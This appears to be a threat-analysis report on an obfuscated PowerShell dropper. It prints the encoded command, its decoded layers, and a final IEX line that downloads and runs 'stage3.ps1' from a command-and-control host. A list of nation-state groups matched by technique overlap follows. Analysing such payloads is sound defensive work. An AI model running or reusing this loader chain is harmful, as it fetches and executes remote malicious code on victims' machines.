Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Dropper, Loader, Defense Evasion.
powershell -nop -w hidden -ep bypass -EncodedCommand JABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEgAWABKAC8AMgBrAEMALwB6AFgASwBPAHcANgBDAE0AQQBBAEEAMABLAHMAWQA0AGkAQQBMAE0AVwBnAE4AYQBsAHgARQBxAEkAQwBmAHkARQBlAHcAeABvAEgAUwBSAGgAcQB3AEkAQgBRAEUAVAA2ACsARAByAGkAOQB2AFcASwA2AHUAWABsADgATAArAGwAQgA4ADIAZwBuAEYANABFAGwAQgBHAEwALwBmAEYAbwB2AEEATgB6AFUARgBVAHUARwBKADYAZwB1AGoAZgA5AE0ATAAzAHQASgBLAGYASQBOAFoARgBZADkAMQBYAE4AUABaADkARgBjAGsATAB6AGgAZgBIAEQAMAA5AG8AaQBnAFIAdgBtAG8ALwBVAFgAZwBZAFcAdwBiAEkAaQBRADQAaQBGAE4AbwBiAEQAUABNAGMAOAAxAE8ANQB5ADkAeQBXAHEASwBEAEcAcQBwAGsARgBFADcAZQBQAFEAOABBAGQAMwBTADcASQAxAG4AMABkAG0AZABaAGUAMwBsAGEARAA0AFQAeABGADgATgB6AHYAdwBrAE8ARwA4ADcAcQBKAG8AaABSAFEATgBuADgAVABhAEgATABrADcANQB0AGsAdQArADgAcwBsAHAAVwBTAEwAQwA4AFoANwBRAGIARAA4AGcATgBhAHgAcgAzAEQAegBBAEEAQQBBAEEAPQA9ACIAKQA7ACQAZwB6AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAWgBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACwAJABiACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABzAHIAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAGcAegApADsAaQBlAHgAIAAkAHMAcgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
Uses PowerShell to execute a base64-encoded PowerShell payload. The payload is obfuscated (3 decode layers); see the decoded content below.
The command leverages Powershell.exe, a Windows binary catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Execute. The command uses 3-layer chained encoding (base64-utf16le → base64-gzip → base64), indicating deliberate multi-stage obfuscation. Deep encoding stacks are strongly associated with mature malware loaders such as Lumma, Latrodectus, and ClickFix-style initial access payloads.
1 network indicator were extracted (0 IPs, 1 URL) and returned no hits across queried threat intelligence sources.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
IEX((New-Object Net.WebClient).DownloadString("http://c2.loader-cdn[.]xyz/stage3.ps1"))$b=[System.Convert]::FromBase64String("H4sIAHXJ/2kC/zXKOw6CMAAA0KsY4iALMWgNalxEqICfyEewxoHSRhqwIBQET6+Dri9vWK6uXl8L+lB82gnF4ElBGL/fFovANzUFUuGJ6gujf9ML3tJKfINZFY91XNPZ9FckLzhfHD09oigRvmo/UXgYWwbIiQ4iFNobDPMc81O5y9yWqKDGqpkFE7ePQ8Ad3S7I1n0dmdZe3laD4TxF8NzvwkOG87qJohRQNn8TaHLk75tku+8slpWSLC8Z7QbD8gNaxr3DzAAAAA==");$gz=New-Object IO.Compression.GZipStream((New-Object IO.MemoryStream(,$b)),[IO.Compression.CompressionMode]::Decompress);$sr=New-Object IO.StreamReader($gz);iex $sr.ReadToEnd()$p=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SUVYKChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vYzIubG9hZGVyLWNkblsuXXh5ei9zdGFnZTMucHMxIikp"));iex $pAll indicators appear clean across queried sources.
Powershell.exe is a a task-based command-line shell built on .NET.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Russian FSB-linked group known for sophisticated backdoors and hijacking other threat actors' infrastructure. Active since at least 2004.
North Korean state-sponsored group linked to the $81M Bangladesh Bank heist, WannaCry ransomware, and Sony Pictures breach. The most prolific nation-state financial threat actor.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.